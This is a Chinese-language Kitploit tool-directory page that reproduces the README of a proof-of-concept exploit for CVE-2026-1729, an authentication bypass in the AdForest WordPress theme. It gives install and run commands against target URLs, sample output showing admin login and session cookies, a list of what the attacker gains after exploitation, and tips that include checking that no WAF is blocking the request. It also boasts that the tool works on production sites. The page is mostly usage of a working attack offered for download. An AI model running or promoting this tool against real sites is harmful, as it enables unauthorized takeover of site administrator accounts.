Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-1729-PoC-AdForest-WordPress-Authentication-Bypass — 用于 WordPress 的 AdForest 主题在所有版本(包括 6.0.12)中均存在身份验证绕过漏洞。这是由于插件在通过 'sb_login_user_with_otp_fun' 函数对用户进行身份验证之前,未能正确验证用户身份。这使得未经身份验证的攻击者能够登录,包括管理员账户。 | Kitploit
工具/GitHubGitHub/ninjazan420/cve-2026-1729-poc-adforest-wordpress-authentication-bypass
身份验证与授权漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubninjazan420/cve-2026-1729-poc-adforest-wordpress-authentication-bypass

CVE-2026-1729-PoC-AdForest-WordPress-Authentication-Bypass

用于 WordPress 的 AdForest 主题在所有版本(包括 6.0.12)中均存在身份验证绕过漏洞。这是由于插件在通过 'sb_login_user_with_otp_fun' 函数对用户进行身份验证之前,未能正确验证用户身份。这使得未经身份验证的攻击者能够登录,包括管理员账户。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
117个月前尚未审核

CVE-2026-1729 - AdForest WordPress 认证绕过 PoC

描述

针对 CVE-2026-1729(PoC)的简易概念验证 - AdForest WordPress 主题中的认证绕过漏洞。 由 f3ds cr3w est 2oo2 编写 博客

功能特性

  • ✅ 无需凭证即可直接获取管理员访问权限
  • ✅ 适用于生产环境中的 WordPress 实例
  • ✅ 无需配置 Docker 环境
  • ✅ 简单的命令行界面
  • ✅ 会话持久化

要求

  • Python 3.6+
  • requests 库

安装

pip install requests

用法

基本用法

python poc/exploit.py https://target-site.com

指定目标用户 ID

python poc/exploit.py https://target-site.com --user-id 2

示例

# Exploit default admin (user ID 1)
python poc/exploit.py https://example.com

# Exploit specific user account
python poc/exploit.py https://example.com --user-id 5

# Test multiple targets
python poc/exploit.py https://site1.com
python poc/exploit.py https://site2.com --user-id 3

输出

CVE-2026-1729 - AdForest WordPress Authentication Bypass
=======================================================
WARNING: For authorized testing only!
=======================================================
[+] Target: https://example.com
[+] Targeting user ID: 1
[+] Sending exploit to: https://example.com/wp-admin/admin-ajax.php
[+] SUCCESS! Admin access granted
[+] Admin URL: https://example.com/wp-admin/
[+] Session cookies: {'wp-settings-time-1': '1234567890', 'wordpress_logged_in_...': '...'}
[+] Logged in as: admin

🎯 Exploit completed successfully!
You now have admin access to the WordPress site.

利用后会发生什么

  1. 管理员访问权限:你将获得对 /wp-admin/ 的完全管理员访问权限
  2. 会话持久化:利用过程会维持会话 Cookie
  3. 用户信息:显示你已入侵的账户
  4. 直接访问:你可以立即访问 WordPress 管理后台

注意事项

  • 合法使用:仅限在你拥有或已获得明确测试许可的网站上使用
  • 目标要求:目标站点必须安装 AdForest 主题
  • 成功率:适用于存在漏洞的 AdForest 主题版本
  • 无需安装:无需在目标服务器上安装任何内容

故障排除

如果利用失败:

  1. 确认已安装 AdForest 主题
  2. 检查站点是否运行 WordPress
  3. 确保主题版本存在漏洞
  4. 确保没有 WAF 或安全插件阻止请求
下载工具